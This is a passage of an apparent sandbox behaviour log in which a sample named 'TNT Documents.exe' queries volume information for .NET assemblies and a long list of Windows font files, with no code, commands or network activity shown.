          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
